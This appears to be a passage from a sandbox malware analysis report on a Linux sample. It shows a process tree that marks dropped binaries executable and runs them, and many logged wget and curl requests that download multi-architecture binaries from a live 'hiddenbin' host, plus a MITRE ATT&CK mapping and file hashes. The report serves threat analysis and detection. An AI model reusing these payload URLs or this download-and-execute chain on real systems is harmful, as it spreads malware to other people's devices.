  chmod +x config-err-TtKvLo netplan_vobrtjej ohshit.sh oqweoqeqq snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JBGpC1 uqwodquojqoqdo.arc uqwodquojqoqdo.arm uqwodquojqoqdo.arm5 uqwodquojqoqdo.arm6 uqwodquojqoqdo.arm7 uqwodquojqoqdo.i468 uqwodquojqoqdo.i686 uqwodquojqoqdo.m68k uqwodquojqoqdo.mips uqwodquojqoqdo.mpsl uqwodquojqoqdo.ppc uqwodquojqoqdo.sh4 uqwodquojqoqdo.spc uqwodquojqoqdo.x86 uqwodquojqoqdo.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1646
- /tmp/oqweoqeqq
  ./oqweoqeqq
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1647

Network

GET

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.x86

Remote address:

107.172.51.228:80

Request

GET /hiddenbin/uqwodquojqoqdo.x86 HTTP/1.1
User-Agent: Wget/1.19.4 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 107.172.51.228
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Tue, 21 Jan 2025 21:07:09 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Tue, 21 Jan 2025 18:59:34 GMT
ETag: "53fc-62c3bfa485180"
Accept-Ranges: bytes
Content-Length: 21500
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.x86

Remote address:

107.172.51.228:80

Request

GET /hiddenbin/uqwodquojqoqdo.x86 HTTP/1.1
Host: 107.172.51.228
User-Agent: curl/7.58.0
Accept: */*

Response

HTTP/1.1 200 OK

Date: Tue, 21 Jan 2025 21:07:10 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Tue, 21 Jan 2025 18:59:34 GMT
ETag: "53fc-62c3bfa485180"
Accept-Ranges: bytes
Content-Length: 21500
GET

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.mips

Remote address:

107.172.51.228:80

Request

GET /hiddenbin/uqwodquojqoqdo.mips HTTP/1.1
User-Agent: Wget/1.19.4 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 107.172.51.228
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Tue, 21 Jan 2025 21:07:10 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Tue, 21 Jan 2025 18:59:34 GMT
ETag: "5ce8-62c3bfa485180"
Accept-Ranges: bytes
Content-Length: 23784
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.mips

Remote address:

107.172.51.228:80

Request

GET /hiddenbin/uqwodquojqoqdo.mips HTTP/1.1
Host: 107.172.51.228
User-Agent: curl/7.58.0
Accept: */*

Response

HTTP/1.1 200 OK

Date: Tue, 21 Jan 2025 21:07:10 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Tue, 21 Jan 2025 18:59:34 GMT
ETag: "5ce8-62c3bfa485180"
Accept-Ranges: bytes
Content-Length: 23784
GET

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arc

Remote address:

107.172.51.228:80

Request

GET /hiddenbin/uqwodquojqoqdo.arc HTTP/1.1
User-Agent: Wget/1.19.4 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 107.172.51.228
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Tue, 21 Jan 2025 21:07:11 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Tue, 21 Jan 2025 18:59:34 GMT
ETag: "1a518-62c3bfa48c35d"
Accept-Ranges: bytes
Content-Length: 107800
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arc

Remote address:

107.172.51.228:80

Request

GET /hiddenbin/uqwodquojqoqdo.arc HTTP/1.1
Host: 107.172.51.228
User-Agent: curl/7.58.0
Accept: */*

Response

HTTP/1.1 200 OK

Date: Tue, 21 Jan 2025 21:07:12 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Tue, 21 Jan 2025 18:59:34 GMT
ETag: "1a518-62c3bfa48c35d"
Accept-Ranges: bytes
Content-Length: 107800
GET

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.i468

Remote address:

107.172.51.228:80

Request

GET /hiddenbin/uqwodquojqoqdo.i468 HTTP/1.1
User-Agent: Wget/1.19.4 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 107.172.51.228
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Tue, 21 Jan 2025 21:07:12 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Content-Length: 227
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
GET

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.i468

Remote address:

107.172.51.228:80

Request

GET /hiddenbin/uqwodquojqoqdo.i468 HTTP/1.1
Host: 107.172.51.228
User-Agent: curl/7.58.0
Accept: */*

Response

HTTP/1.1 404 Not Found

Date: Tue, 21 Jan 2025 21:07:13 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Content-Length: 227
Content-Type: text/html; charset=iso-8859-1
GET

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.i686

Remote address:

107.172.51.228:80

Request

GET /hiddenbin/uqwodquojqoqdo.i686 HTTP/1.1
User-Agent: Wget/1.19.4 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 107.172.51.228
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Tue, 21 Jan 2025 21:07:13 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Content-Length: 227
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
GET

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.i686

Remote address:

107.172.51.228:80

Request

GET /hiddenbin/uqwodquojqoqdo.i686 HTTP/1.1
Host: 107.172.51.228
User-Agent: curl/7.58.0
Accept: */*

Response

HTTP/1.1 404 Not Found

Date: Tue, 21 Jan 2025 21:07:13 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Content-Length: 227
Content-Type: text/html; charset=iso-8859-1
GET

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.x86_64

Remote address:

107.172.51.228:80

Request

GET /hiddenbin/uqwodquojqoqdo.x86_64 HTTP/1.1
User-Agent: Wget/1.19.4 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 107.172.51.228
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Tue, 21 Jan 2025 21:07:13 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Content-Length: 229
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
GET

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.x86_64

Remote address:

107.172.51.228:80

Request

GET /hiddenbin/uqwodquojqoqdo.x86_64 HTTP/1.1
Host: 107.172.51.228
User-Agent: curl/7.58.0
Accept: */*

Response

HTTP/1.1 404 Not Found

Date: Tue, 21 Jan 2025 21:07:14 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Content-Length: 229
Content-Type: text/html; charset=iso-8859-1
GET

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.mpsl

Remote address:

107.172.51.228:80

Request

GET /hiddenbin/uqwodquojqoqdo.mpsl HTTP/1.1
User-Agent: Wget/1.19.4 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 107.172.51.228
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Tue, 21 Jan 2025 21:07:14 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Tue, 21 Jan 2025 18:59:34 GMT
ETag: "6150-62c3bfa485180"
Accept-Ranges: bytes
Content-Length: 24912
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.mpsl

Remote address:

107.172.51.228:80

Request

GET /hiddenbin/uqwodquojqoqdo.mpsl HTTP/1.1
Host: 107.172.51.228
User-Agent: curl/7.58.0
Accept: */*

Response

HTTP/1.1 200 OK

Date: Tue, 21 Jan 2025 21:07:14 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Tue, 21 Jan 2025 18:59:34 GMT
ETag: "6150-62c3bfa485180"
Accept-Ranges: bytes
Content-Length: 24912
GET

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm

Remote address:

107.172.51.228:80

Request

GET /hiddenbin/uqwodquojqoqdo.arm HTTP/1.1
User-Agent: Wget/1.19.4 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 107.172.51.228
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Tue, 21 Jan 2025 21:07:15 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Tue, 21 Jan 2025 18:59:34 GMT
ETag: "5698-62c3bfa485180"
Accept-Ranges: bytes
Content-Length: 22168
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm

Remote address:

107.172.51.228:80

Request

GET /hiddenbin/uqwodquojqoqdo.arm HTTP/1.1
Host: 107.172.51.228
User-Agent: curl/7.58.0
Accept: */*

Response

HTTP/1.1 200 OK

Date: Tue, 21 Jan 2025 21:07:17 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Tue, 21 Jan 2025 18:59:34 GMT
ETag: "5698-62c3bfa485180"
Accept-Ranges: bytes
Content-Length: 22168
GET

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm5

Remote address:

107.172.51.228:80

Request

GET /hiddenbin/uqwodquojqoqdo.arm5 HTTP/1.1
User-Agent: Wget/1.19.4 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 107.172.51.228
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Tue, 21 Jan 2025 21:07:18 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Tue, 21 Jan 2025 18:59:34 GMT
ETag: "4838-62c3bfa485180"
Accept-Ranges: bytes
Content-Length: 18488
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm5

Remote address:

107.172.51.228:80

Request

GET /hiddenbin/uqwodquojqoqdo.arm5 HTTP/1.1
Host: 107.172.51.228
User-Agent: curl/7.58.0
Accept: */*

Response

HTTP/1.1 200 OK

Date: Tue, 21 Jan 2025 21:07:18 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Tue, 21 Jan 2025 18:59:34 GMT
ETag: "4838-62c3bfa485180"
Accept-Ranges: bytes
Content-Length: 18488
GET

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm6

Remote address:

107.172.51.228:80

Request

GET /hiddenbin/uqwodquojqoqdo.arm6 HTTP/1.1
User-Agent: Wget/1.19.4 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 107.172.51.228
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Tue, 21 Jan 2025 21:07:18 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Tue, 21 Jan 2025 18:59:34 GMT
ETag: "6aa4-62c3bfa485180"
Accept-Ranges: bytes
Content-Length: 27300
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm6

Remote address:

107.172.51.228:80

Request

GET /hiddenbin/uqwodquojqoqdo.arm6 HTTP/1.1
Host: 107.172.51.228
User-Agent: curl/7.58.0
Accept: */*

Response

HTTP/1.1 200 OK

Date: Tue, 21 Jan 2025 21:07:19 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Tue, 21 Jan 2025 18:59:34 GMT
ETag: "6aa4-62c3bfa485180"
Accept-Ranges: bytes
Content-Length: 27300
GET

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm7

Remote address:

107.172.51.228:80

Request

GET /hiddenbin/uqwodquojqoqdo.arm7 HTTP/1.1
User-Agent: Wget/1.19.4 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 107.172.51.228
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Tue, 21 Jan 2025 21:07:20 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Tue, 21 Jan 2025 18:59:34 GMT
ETag: "b620-62c3bfa485180"
Accept-Ranges: bytes
Content-Length: 46624
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm7

Remote address:

107.172.51.228:80

Request

GET /hiddenbin/uqwodquojqoqdo.arm7 HTTP/1.1
Host: 107.172.51.228
User-Agent: curl/7.58.0
Accept: */*

Response

HTTP/1.1 200 OK

Date: Tue, 21 Jan 2025 21:07:20 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Tue, 21 Jan 2025 18:59:34 GMT
ETag: "b620-62c3bfa485180"
Accept-Ranges: bytes
Content-Length: 46624
GET

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.ppc

Remote address:

107.172.51.228:80

Request

GET /hiddenbin/uqwodquojqoqdo.ppc HTTP/1.1
User-Agent: Wget/1.19.4 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 107.172.51.228
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Tue, 21 Jan 2025 21:07:21 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Tue, 21 Jan 2025 18:59:34 GMT
ETag: "557c-62c3bfa485180"
Accept-Ranges: bytes
Content-Length: 21884
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.ppc

Remote address:

107.172.51.228:80

Request

GET /hiddenbin/uqwodquojqoqdo.ppc HTTP/1.1
Host: 107.172.51.228
User-Agent: curl/7.58.0
Accept: */*

Response

HTTP/1.1 200 OK

Date: Tue, 21 Jan 2025 21:07:21 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Tue, 21 Jan 2025 18:59:34 GMT
ETag: "557c-62c3bfa485180"
Accept-Ranges: bytes
Content-Length: 21884
GET

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.spc

Remote address:

107.172.51.228:80

Request

GET /hiddenbin/uqwodquojqoqdo.spc HTTP/1.1
User-Agent: Wget/1.19.4 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 107.172.51.228
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Tue, 21 Jan 2025 21:07:22 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Tue, 21 Jan 2025 18:59:34 GMT
ETag: "e408-62c3bfa48c745"
Accept-Ranges: bytes
Content-Length: 58376
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.spc

Remote address:

107.172.51.228:80

Request

GET /hiddenbin/uqwodquojqoqdo.spc HTTP/1.1
Host: 107.172.51.228
User-Agent: curl/7.58.0
Accept: */*

Response

HTTP/1.1 200 OK

Date: Tue, 21 Jan 2025 21:07:23 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Tue, 21 Jan 2025 18:59:34 GMT
ETag: "e408-62c3bfa48c745"
Accept-Ranges: bytes
Content-Length: 58376
GET

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.m68k

Remote address:

107.172.51.228:80

Request

GET /hiddenbin/uqwodquojqoqdo.m68k HTTP/1.1
User-Agent: Wget/1.19.4 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 107.172.51.228
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Tue, 21 Jan 2025 21:07:23 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Tue, 21 Jan 2025 18:59:34 GMT
ETag: "d694-62c3bfa48c35d"
Accept-Ranges: bytes
Content-Length: 54932
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.m68k

Remote address:

107.172.51.228:80

Request

GET /hiddenbin/uqwodquojqoqdo.m68k HTTP/1.1
Host: 107.172.51.228
User-Agent: curl/7.58.0
Accept: */*

Response

HTTP/1.1 200 OK

Date: Tue, 21 Jan 2025 21:07:24 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Tue, 21 Jan 2025 18:59:34 GMT
ETag: "d694-62c3bfa48c35d"
Accept-Ranges: bytes
Content-Length: 54932
GET

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.sh4

Remote address:

107.172.51.228:80

Request

GET /hiddenbin/uqwodquojqoqdo.sh4 HTTP/1.1
User-Agent: Wget/1.19.4 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 107.172.51.228
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Tue, 21 Jan 2025 21:07:25 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Tue, 21 Jan 2025 18:59:34 GMT
ETag: "c3f8-62c3bfa48c745"
Accept-Ranges: bytes
Content-Length: 50168
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.sh4

Remote address:

107.172.51.228:80

Request

GET /hiddenbin/uqwodquojqoqdo.sh4 HTTP/1.1
Host: 107.172.51.228
User-Agent: curl/7.58.0
Accept: */*

Response

HTTP/1.1 200 OK

Date: Tue, 21 Jan 2025 21:07:25 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Tue, 21 Jan 2025 18:59:34 GMT
ETag: "c3f8-62c3bfa48c745"
Accept-Ranges: bytes
Content-Length: 50168

107.172.51.228:80

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.x86

http

645 B
22.8kB
9
20

HTTP Request

GET http://107.172.51.228/hiddenbin/uqwodquojqoqdo.x86

HTTP Response

200
107.172.51.228:80

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.x86

http

634 B
22.8kB
10
20

HTTP Request

GET http://107.172.51.228/hiddenbin/uqwodquojqoqdo.x86

HTTP Response

200
107.172.51.228:3778

903 B
742 B
17
14
107.172.51.228:80

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.mips

http

594 B
25.2kB
8
21

HTTP Request

GET http://107.172.51.228/hiddenbin/uqwodquojqoqdo.mips

HTTP Response

200
107.172.51.228:80

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.mips

http

687 B
25.1kB
11
21

HTTP Request

GET http://107.172.51.228/hiddenbin/uqwodquojqoqdo.mips

HTTP Response

200
107.172.51.228:3778

903 B
742 B
17
14
107.172.51.228:80

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arc

http

1.9kB
112.5kB
33
84

HTTP Request

GET http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arc

HTTP Response

200
107.172.51.228:80

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arc

http

1.6kB
112.4kB
29
84

HTTP Request

GET http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arc

HTTP Response

200
185.125.188.62:443

tls

135 B
2
185.125.188.61:443

tls

135 B
2
151.101.193.91:443

tls, https

233 B
40 B
1
1
151.101.193.91:443

extensions.gnome.org

tls

976 B
5.8kB
12
14
89.187.167.4:443

tls, https

32.1kB
123
107.172.51.228:3778

903 B
742 B
17
14
107.172.51.228:80

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.i468

http

490 B
670 B
6
4

HTTP Request

GET http://107.172.51.228/hiddenbin/uqwodquojqoqdo.i468

HTTP Response

404
107.172.51.228:80

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.i468

http

427 B
614 B
6
4

HTTP Request

GET http://107.172.51.228/hiddenbin/uqwodquojqoqdo.i468

HTTP Response

404
107.172.51.228:3778

903 B
742 B
17
14
107.172.51.228:80

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.i686

http

490 B
670 B
6
4

HTTP Request

GET http://107.172.51.228/hiddenbin/uqwodquojqoqdo.i686

HTTP Response

404
107.172.51.228:80

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.i686

http

427 B
614 B
6
4

HTTP Request

GET http://107.172.51.228/hiddenbin/uqwodquojqoqdo.i686

HTTP Response

404
107.172.51.228:3778

903 B
742 B
17
14
107.172.51.228:80

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.x86_64

http

492 B
672 B
6
4

HTTP Request

GET http://107.172.51.228/hiddenbin/uqwodquojqoqdo.x86_64

HTTP Response

404
107.172.51.228:80

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.x86_64

http

429 B
616 B
6
4

HTTP Request

GET http://107.172.51.228/hiddenbin/uqwodquojqoqdo.x86_64

HTTP Response

404
107.172.51.228:3778

851 B
690 B
16
13
107.172.51.228:80

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.mpsl

http

646 B
26.3kB
9
22

HTTP Request

GET http://107.172.51.228/hiddenbin/uqwodquojqoqdo.mpsl

HTTP Response

200
107.172.51.228:80

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.mpsl

http

775 B
26.3kB
12
22

HTTP Request

GET http://107.172.51.228/hiddenbin/uqwodquojqoqdo.mpsl

HTTP Response

200
107.172.51.228:3778

851 B
638 B
16
12
107.172.51.228:80

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm

http

861 B
23.4kB
12
19

HTTP Request

GET http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm

HTTP Response

200
107.172.51.228:80

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm

http

686 B
23.4kB
11
20

HTTP Request

GET http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm

HTTP Response

200
107.172.51.228:3778

851 B
690 B
16
13
107.172.51.228:80

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm5

http

698 B
19.7kB
10
17

HTTP Request

GET http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm5

HTTP Response

200
107.172.51.228:80

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm5

http

583 B
19.6kB
9
17

HTTP Request

GET http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm5

HTTP Response

200
107.172.51.228:3778

851 B
690 B
16
13
107.172.51.228:80

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm6

http

750 B
28.8kB
11
24

HTTP Request

GET http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm6

HTTP Response

200
107.172.51.228:80

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm6

http

583 B
28.8kB
9
24

HTTP Request

GET http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm6

HTTP Response

200
107.172.51.228:3778

851 B
690 B
16
13
107.172.51.228:80

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm7

http

1.2kB
48.9kB
19
38

HTTP Request

GET http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm7

HTTP Response

200
107.172.51.228:80

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm7

http

895 B
48.8kB
15
38

HTTP Request

GET http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm7

HTTP Response

200
107.172.51.228:3778

851 B
690 B
16
13
107.172.51.228:80

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.ppc

http

697 B
23.2kB
10
20

HTTP Request

GET http://107.172.51.228/hiddenbin/uqwodquojqoqdo.ppc

HTTP Response

200
107.172.51.228:80

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.ppc

http

582 B
23.1kB
9
20

HTTP Request

GET http://107.172.51.228/hiddenbin/uqwodquojqoqdo.ppc

HTTP Response

200
107.172.51.228:3778

851 B
690 B
16
13
107.172.51.228:80

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.spc

http

1.2kB
61.1kB
20
47

HTTP Request

GET http://107.172.51.228/hiddenbin/uqwodquojqoqdo.spc

HTTP Response

200
107.172.51.228:80

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.spc

http

842 B
61.0kB
14
47

HTTP Request

GET http://107.172.51.228/hiddenbin/uqwodquojqoqdo.spc

HTTP Response

200
107.172.51.228:3778

851 B
690 B
16
13
107.172.51.228:80

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.m68k

http

1.1kB
57.6kB
17
45

HTTP Request

GET http://107.172.51.228/hiddenbin/uqwodquojqoqdo.m68k

HTTP Response

200
107.172.51.228:80

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.m68k

http

1.1kB
57.5kB
18
45

HTTP Request

GET http://107.172.51.228/hiddenbin/uqwodquojqoqdo.m68k

HTTP Response

200
107.172.51.228:3778

851 B
690 B
16
13
107.172.51.228:80

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.sh4

http

1.3kB
52.6kB
21
41

HTTP Request

GET http://107.172.51.228/hiddenbin/uqwodquojqoqdo.sh4

HTTP Response

200
107.172.51.228:80

http://107.172.51.228/hiddenbin/uqwodquojqoqdo.sh4

http

998 B
52.5kB
17
41

HTTP Request

GET http://107.172.51.228/hiddenbin/uqwodquojqoqdo.sh4

HTTP Response

200
107.172.51.228:3778

851 B
690 B
16
13

224.0.0.251:5353

146 B
2

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/uqwodquojqoqdo.x86

Filesize
20KB

MD5
313c4b235e0e62ca38eb04bfa7677e44

SHA1
c31d5d0c0fa4bfa4ea2837cede424504c68ccfd3

SHA256
dfd6f81327b03f5336895c6bed7bfff178a054eafef5637ccb74e7a0ac4ef4c4

SHA512
0bf52b087e48b6daac55f735ae5b5af7626322db3200e72c61755d6b80234c503a02f3e35b340b70d1731fdec2054f530251504dec55497ca5877f9233ff54ad

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.